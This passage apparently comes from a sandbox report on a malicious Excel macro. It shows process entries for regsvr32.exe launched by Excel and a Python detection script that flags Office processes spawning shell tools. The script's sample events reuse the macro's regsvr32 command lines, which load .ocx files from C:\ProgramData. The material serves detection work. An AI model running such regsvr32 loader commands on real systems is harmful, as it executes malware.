17:20:34 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xff350000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
17:20:35 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xff350000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
17:20:35 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xff350000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
17:20:36 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xff350000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
17:20:37 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xff350000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
The Commandline field is empty for all seven entries in this copy. The six regsvr32.exe processes started between 17:20:34 and 17:20:37, one per EXEC("regsvr32 ...") formula in the macro, and all ran with the same elevated, administrator-level token as the Excel process that spawned them.
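The six regsvr32.exe children above are exactly the parent/child pairing that the report's Sigma hit (Microsoft Office Product Spawning Windows Shell) keys on. As an added example, not part of the report and not the Sigma project's rule, the following Python script runs two checks over constructed Sysmon-style process-creation events: the Office-parent/LOLBin-child pairing, and a narrower check for regsvr32 being pointed at a file under a user-writable directory such as C:\ProgramData, which is what this sample's EXEC strings do. The events are constructed (the report's process entries have empty command lines, so the first two command lines are taken from the macro formulas and the two benign controls are invented), and the Office and child-process lists are abbreviated assumptions rather than a copy of the published rule.

```python
import re

# Constructed Sysmon-style process-creation events; not from the report, whose
# process entries have empty command lines. Events 0 and 1 reuse the regsvr32
# strings from the macro's EXEC formulas, events 2 and 3 are benign controls.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 C:\ProgramData\Volet1.ocx"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Windows\System32\example.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

# Abbreviated lists (my assumption, not a copy of the Sigma rule the report cites).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                  "rundll32.exe", "regsvr32.exe", "msiexec.exe", "wmic.exe", "schtasks.exe"}
# A regsvr32 target under a directory any user can write to, as C:\ProgramData is.
USER_WRITABLE = re.compile(r"(?i)\\(programdata|users\\[^\\]+\\appdata|windows\\temp)\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev):  # the pairing the Sigma rule keys on
    return basename(ev["ParentImage"]) in OFFICE_PARENTS and basename(ev["Image"]) in SHELL_CHILDREN


def regsvr32_user_writable_target(ev):  # narrower: what this sample's EXEC strings do
    return basename(ev["Image"]) == "regsvr32.exe" and USER_WRITABLE.search(ev["CommandLine"]) is not None


RULES = {"office_spawns_shell": office_spawns_shell,
         "regsvr32_user_writable_target": regsvr32_user_writable_target}


def evaluate(ev):
    """Names of the rules an event matches, in RULES order."""
    return [name for name, rule in RULES.items() if rule(ev)]


def triage(events):
    return [(basename(e["Image"]), evaluate(e)) for e in events]


if __name__ == "__main__":
    for image, hits in triage(EVENTS):
        print(f"{image:14} {', '.join(hits) or '-'}")
```

Both constructed malicious events trip both rules; the explorer-launched regsvr32 registering a System32 DLL and Excel's print helper splwow64.exe trip neither. The broad rule is the one to alert on in most environments, the narrower one is a cheap way to rank the alert: an Office process handing regsvr32 a file in ProgramData is far rarer than Office spawning a child at all.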
Disassembly |
---|
Code Analysis |
---|